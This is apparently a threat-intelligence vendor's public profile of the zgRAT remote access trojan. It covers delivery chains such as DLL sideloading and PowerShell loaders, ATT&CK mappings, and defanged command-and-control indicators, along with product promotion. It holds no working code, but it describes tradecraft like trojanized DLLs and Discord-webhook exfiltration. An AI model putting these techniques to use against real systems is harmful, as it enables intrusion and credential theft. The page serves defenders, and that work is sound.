Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 1 actor

zgRAT

zgRAT is a malware family observed as a payload in multiple delivery chains and commonly referenced as a remote access trojan. The provided reporting shows it delivered through DLL sideloading, PowerShell-based chains, and companion-loader activity. In one Proofpoint-observed chain, a renamed legitimate Ace Stream executable sideloaded a trojanized PYTHON27.DLL containing DOILoader, which executed an encrypted payload in Vos.xwtx to run zgRAT; the associated command-and-control endpoint was 84[.]32[.]41[.]163:7705. In another tax-themed campaign, a JavaScript file hosted on Microsoft Azure launched PowerShell, which executed Rhadamanthys and then downloaded and ran zgRAT. zgRAT was also observed delivered with PureHVNC through DLL sideloading using a legitimate psl.exe binary that loaded a trojanized libpsl-5.dll with 99 obfuscated exports. In the Booking.com-themed campaign active from December 2025 through March 2026, the final payloads were zgRAT and PureHVNC, providing remote access, screen control, credential theft, and persistence on infected systems. Reporting also notes use of Discord CDN links to distribute zgRAT and Discord webhooks to exfiltrate stolen data including credentials, browser cookies, and cryptocurrency wallets. zgRAT has been seen alongside or delivered by malware such as DOILoader, Rhadamanthys, CastleLoader, HijackLoader, Amadey, XWorm, NetSupport, Lumma Stealer, Remcos, BitRAT, Screenshotter/AHK Bot, XLoader, and PureHVNC. Associated activity clusters and actors mentioned in the content include Aggah, GrayBravo/TAG-160, and broader Proofpoint-tracked campaigns targeting sectors including hospitality, logistics, travel, and hospitality-adjacent organizations, as well as users reached through phishing and malware-delivery websites.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Aggah

This PowerShell script ran Rhadamanthys malware. Rhadamanthys was then observed to download and run zgRAT.

via proofpointproofpoint.com
MITRE ATT&CK

Techniques & procedures

20 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.002Spearphishing LinkEvidence2

MITRE ATT&CK Mapping Tactic Technique ID Implementation Initial Access Phishing: Spearphishing Link T1566.002 Booking.com themed Italian spam

Execution

5 techniques
T1059.001PowerShellEvidence2

The JavaScript called PowerShell to run a remote PowerShell script. This PowerShell script ran Rhadamanthys malware.

T1059.007JavaScriptEvidence1

These messages contained URLs leading to a download of a JavaScript file hosted on Microsoft Azure. The JavaScript called PowerShell to run a remote PowerShell script.

T1204User ExecutionEvidence2

These messages contained URLs leading to a download of a JavaScript file hosted on Microsoft Azure. The JavaScript called PowerShell to run a remote PowerShell script.

T1204.001Malicious LinkEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Execution User Execution: Malicious Link T1204.001 ClickFix/FakeCaptcha pages

T1204.002Malicious FileEvidence1

The RAR file contained the executable “Rechnung DE009100019000.exe”... When the .exe was executed, it sideloaded the included PYTHON27.DLL...

Persistence

1 technique
T1547.001Registry Run Keys / Startup FolderEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Persistence Boot or Logon Autostart: Registry Run Keys T1547.001 HKCU...\CurrentVersion\Run

Privilege Escalation

1 technique
T1547.001Registry Run Keys / Startup FolderEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Persistence Boot or Logon Autostart: Registry Run Keys T1547.001 HKCU...\CurrentVersion\Run

Stealth

3 techniques
T1027.002Software PackingEvidence2

MITRE ATT&CK Mapping ... Defense Evasion Obfuscated Files: Software Packing T1027.002 Donut + .NET Reactor + ZgRAT (three-layer packing)

T1036.005Match Legitimate Resource Name or LocationEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Masquerading: Match Legitimate Name T1036.005 msedge_elf.dll, libpsl-5.dll

T1497Virtualization/Sandbox EvasionEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Virtualization/Sandbox Evasion T1497 Benign API calls (catfact.ninja, httpbin.org) for timing

Credential Access

2 techniques
T1539Steal Web Session CookieEvidence1

According to Trellix's data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices.

T1649Steal or Forge Authentication CertificatesEvidence1

According to Trellix's data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices.

Discovery

3 techniques
T1033System Owner/User DiscoveryEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Discovery System Owner/User Discovery T1033 Username, admin status collection

T1082System Information DiscoveryEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Discovery System Information Discovery T1082 PS1 fingerprinting (OS, model, AV products)

T1497Virtualization/Sandbox EvasionEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Virtualization/Sandbox Evasion T1497 Benign API calls (catfact.ninja, httpbin.org) for timing

Collection

1 technique
T1560Archive Collected DataEvidence1

If the target completed the ClickFix steps as instructed, a command was initiated to download a tar archive and run CastleLoader.

Command and Control

3 techniques
T1071.001Web ProtocolsEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation C2 Application Layer Protocol: Web T1071.001 HTTPS to asmweosiqsaaw[.]com

T1102Web ServiceEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation C2 Web Service T1102 Cloudflare-proxied C2

T1105Ingress Tool TransferEvidence4

This PowerShell script ran Rhadamanthys malware. Rhadamanthys was then observed to download and run zgRAT.

Exfiltration

2 techniques
T1041Exfiltration Over C2 ChannelEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Exfiltration Exfiltration Over C2 Channel T1041 Via zgRAT C2 protocol

T1567Exfiltration Over Web ServiceEvidence1

Discord's permanent file hosting capabilities have frequently been misused to distribute malware and exfiltrate data gathered from compromised systems using webhooks.

INDICATORS OF COMPROMISE

IOCs tracked for this family

45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
28 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
10 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
7 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app
breakglass intelNews
Mar 12, 2026
ResolverRAT Bundles LummaStealer in a Triple-Encrypted .NET Loader: Five Linked Samples, Four C2 Servers, and a Fake Microsoft Domain - Breakglass Intelligence - Breakglass Intelligence

Crypter layer wrapping the .NET payload, providing obfuscation, string encryption, and anti-debugging as part of the multi-layer loader chain.

Read more
breakglass intelNews
Mar 12, 2026
Booking.com ClickFix Drops zgRAT via Stolen Dodo.com Wildcard Cert: Bulletproof Hosting, DLL Sideloading, and 14 Phishing Subdomains Targeting Hospitality - Breakglass Intelligence - Breakglass Intelligence

Remote access trojan delivered via PowerShell and DLL sideloading that provides persistent access, remote control, screen control, and credential theft from browsers and email clients.

Read more
recorded future blogNews
Dec 9, 2025
GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries

zgRAT is a remote access trojan delivered as a payload by CastleLoader and other loaders in phishing campaigns.

Read more
proofpoint threat insight blogNews
Nov 12, 2025
Operation Endgame Quakes Rhadamanthys | Proofpoint US

Observed as a companion payload with Rhadamanthys; in one campaign DOILoader was observed loading zgRAT.

Read more
+4 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching45

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping20

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.